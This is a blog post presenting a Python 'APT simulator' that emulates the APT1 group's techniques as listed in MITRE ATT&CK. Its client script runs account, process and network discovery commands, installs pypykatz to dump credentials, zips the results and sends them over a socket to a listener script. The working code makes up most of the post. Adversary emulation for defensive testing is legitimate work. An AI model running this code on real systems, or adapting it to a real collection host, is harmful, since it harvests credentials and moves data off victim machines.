Article cover

24.11.2022

8

Like

129

Views

Python APT Simulator

APT Simulator

Tested Windows 10


Description

Information from Mitre ATT&CK regarding the APT1 group is as follows:

APT1 used the commands net localgroup,net user, and net group to find accounts on the system.

APT1 has used RAR to compress files before moving them outside of the victim network.

APT1 used a batch script to perform a series of discovery techniques and saves it to a text file.

APT1 has collected files from a local victim.

APT1 listed connected network shares.

APT1 has been known to use credential dumping using Mimikatz.

APT1 gathered a list of running processes on the system using tasklist /v.

APT1 used the ipconfig /all command to gather network configuration information.

APT1 used the net use command to get a listing on network connections.

APT1 used the commands net start and tasklist to get a listing of the services on the system.


Installation

git clone https://github.com/anil-yelken/APT-Simulator


Usage

First of all we start apt1_server.py in server machine. After we start apt1.py in victim machine.


apt1_server.py


import socket
s = socket.socket()
s.bind(("0.0.0.0", 80))
s.listen()
client_socket, address = s.accept()
print(f"[+] {address} is connected.")
with open("received_file.zip", "wb") as f:
    while True:
        bytes_read = client_socket.recv(4096)
        if not bytes_read:
            break
        f.write(bytes_read)
client_socket.close()
s.close()


apt1_client.py


import subprocess
import os
import zipfile
import socket
try:
    localgroup=subprocess.check_output("net localgroup",shell=True)
    with open("localgroup.txt", 'wb') as file:
        file.write(localgroup)
except:
    pass
try:
    user=subprocess.check_output("net user",shell=True)
    with open("user.txt", 'wb') as file:
        file.write(user)
except:
    pass
try:
    group=subprocess.check_output("net group",shell=True)
    with open("group.txt", 'wb') as file:
        file.write(group)
except:
    pass
try:
    tasklist=subprocess.check_output("tasklist /v",shell=True)
    with open("tasklist.txt", 'wb') as file:
        file.write(tasklist)
except:
    pass
try:
    netuse=subprocess.check_output("net use",shell=True)
    with open("netuse.txt", 'wb') as file:
        file.write(netuse)
except:
    pass
try:
    netstart=subprocess.check_output("net start",shell=True)
    with open("netstart.txt", 'wb') as file:
        file.write(netstart)
except:
    pass
try:
    ipconfig=subprocess.check_output("ipconfig /all",shell=True)
    with open("ipconfig.txt", 'wb') as file:
        file.write(ipconfig)
except:
    pass
try:
    os.system("pip3 install pypykatz")
except:
    pass
try:
    os.system("pypykatz.py rekall dump -t 0")
    print("pypykatz is finished.")
except:
    pass

try:
    file_zip = zipfile.ZipFile('file.zip', 'w')
    for folder, subfolders, files in os.walk('.'):
        for file in files:
            if file.endswith('.txt'):
                file_zip.write(os.path.join(folder, file),
                              os.path.relpath(os.path.join(folder, file), '.'),
                              compress_type=zipfile.ZIP_DEFLATED)
    file_zip.close()
    print("Files are compressed.")
    s = socket.socket()
    s.connect(("127.0.0.1", 80))
    with open("file.zip", "rb") as f:
        while True:
            bytes_read = f.read(4096)
            if not bytes_read:
                break
            s.sendall(bytes_read)
    s.close()
    print("Zip file sent.")
except:
    pass
Python Temel
İleri Python

Comments

You need to log in to be able to comment!

Anil Yelken

Siber Güvenlik Uzmanı,yazılım meraklısı ve ilelebet öğrenci https://siberguvenlikveyazilim.com https://www.youtube.com/@siberguvenlikveyazilim

Location

Ankara, TR

Education

Elektronik ve Haberleşme Mühendisliği - Kocaeli Üniversitesi

© 2021 Patika Dev

facebook
twitter
instagram
youtube
linkedin